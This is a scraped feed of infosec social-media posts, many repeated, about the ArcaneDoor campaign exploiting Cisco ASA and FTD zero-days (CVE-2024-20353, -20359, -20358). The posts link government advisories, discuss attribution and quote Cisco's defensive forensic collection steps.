screaminggoat@infosec.exchange at 2024-05-02T14:00:55.000Z ##

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel

##

screaminggoat@infosec.exchange at 2024-04-26T20:16:17.000Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-25T02:52:31.000Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

##

avuko@infosec.exchange at 2024-04-24T20:59:17.000Z ##

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat@infosec.exchange at 2024-04-24T19:27:17.000Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

screaminggoat@infosec.exchange at 2024-04-24T19:16:42.000Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-24T16:53:30.000Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

##

H3liumb0y at 2024-04-25T07:25:30.414Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

##

H3liumb0y@infosec.exchange at 2024-04-25T07:25:30.000Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

##

screaminggoat at 2024-05-02T14:00:55.015Z ##

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

##

screaminggoat at 2024-04-26T20:16:17.085Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat at 2024-04-25T02:52:31.608Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

##

avuko at 2024-04-24T20:59:17.602Z ##

So, if you think you've maybe got / issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE () in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat at 2024-04-24T19:27:17.460Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

##

screaminggoat at 2024-04-24T19:16:42.383Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat at 2024-04-24T16:53:30.823Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

##

screaminggoat@infosec.exchange at 2024-05-02T14:00:55.000Z ##

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel

##

screaminggoat@infosec.exchange at 2024-04-26T20:16:17.000Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-25T02:52:31.000Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

##

avuko@infosec.exchange at 2024-04-24T20:59:17.000Z ##

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat@infosec.exchange at 2024-04-24T19:27:17.000Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

screaminggoat@infosec.exchange at 2024-04-24T19:16:42.000Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat@infosec.exchange at 2024-04-24T16:53:30.000Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

##

H3liumb0y at 2024-04-25T07:25:30.414Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

##

H3liumb0y@infosec.exchange at 2024-04-25T07:25:30.000Z ##

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

  • Cisco Adaptive Security Appliance (ASA) Software
  • Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

##

h4sh at 2024-04-26T02:00:08.232Z ##

Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.

They don't know how the attackers initially got in.

Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":

> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.

cyber.gc.ca/en/news-events/cyb

blog.talosintelligence.com/arc

##

jos1264@social.skynetcloud.site at 2024-04-24T20:55:04.000Z ##

ArcaneDoor Attack (CVE-2024-20353 and CVE-2024-20359) fortiguard.fortinet.com/threat

##

jos1264@social.skynetcloud.site at 2024-04-24T18:45:04.000Z ##

Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) helpnetsecurity.com/2024/04/24 #government-backedattacks #securityupdate #Don'tmiss #Microsoft #Hotstuff #firewall #0-day #Cisco #Lumen #News #CISA #NCSC

##

screaminggoat at 2024-04-24T16:34:11.579Z ##

@GossiTheDog Here are the CVE security advisories:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
##

GossiTheDog@cyberplace.social at 2024-04-24T16:19:22.000Z ##

🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year

CVE-2024-20353 and CVE-2024-20359

blog.talosintelligence.com/arc

#threatintel #ArcaneDoor

##

screaminggoat at 2024-04-24T16:11:54.051Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

##

h4sh@infosec.exchange at 2024-04-26T02:00:08.000Z ##

Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.

They don't know how the attackers initially got in.

Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":

> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.

cyber.gc.ca/en/news-events/cyb

blog.talosintelligence.com/arc

##

screaminggoat@infosec.exchange at 2024-04-24T16:34:11.000Z ##

@GossiTheDog Here are the CVE security advisories:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
##

GossiTheDog@cyberplace.social at 2024-04-24T16:19:22.000Z ##

🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year

CVE-2024-20353 and CVE-2024-20359

blog.talosintelligence.com/arc

#threatintel #ArcaneDoor

##

screaminggoat@infosec.exchange at 2024-04-24T16:11:54.000Z ##

Wake up babe, new Cisco actively exploited zero days just dropped:

  • CVE-2024-20353 (8.6 high) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability
  • CVE-2024-20359 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability

Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.

See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak

See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart

Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! cisa.gov/news-events/alerts/20

EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: cyber.gc.ca/en/news-events/cyb

EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:

cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC

##

CVE-2024-20353
(8.6 HIGH)

EPSS: 0.35%

updated 2024-04-26T15:22:27.803000

52 posts

A vulnerability in the management and VPN web servers for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to incomplete error checking when parsing an HTTP header. An attacker co

2 repos

https://github.com/Spl0stus/CVE-2024-20353-CiscoASAandFTD

https://github.com/west-wind/Threat-Hunting-With-Splunk

screaminggoat at 2024-05-02T14:00:55.015Z ##

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

##

screaminggoat at 2024-04-26T20:16:17.085Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

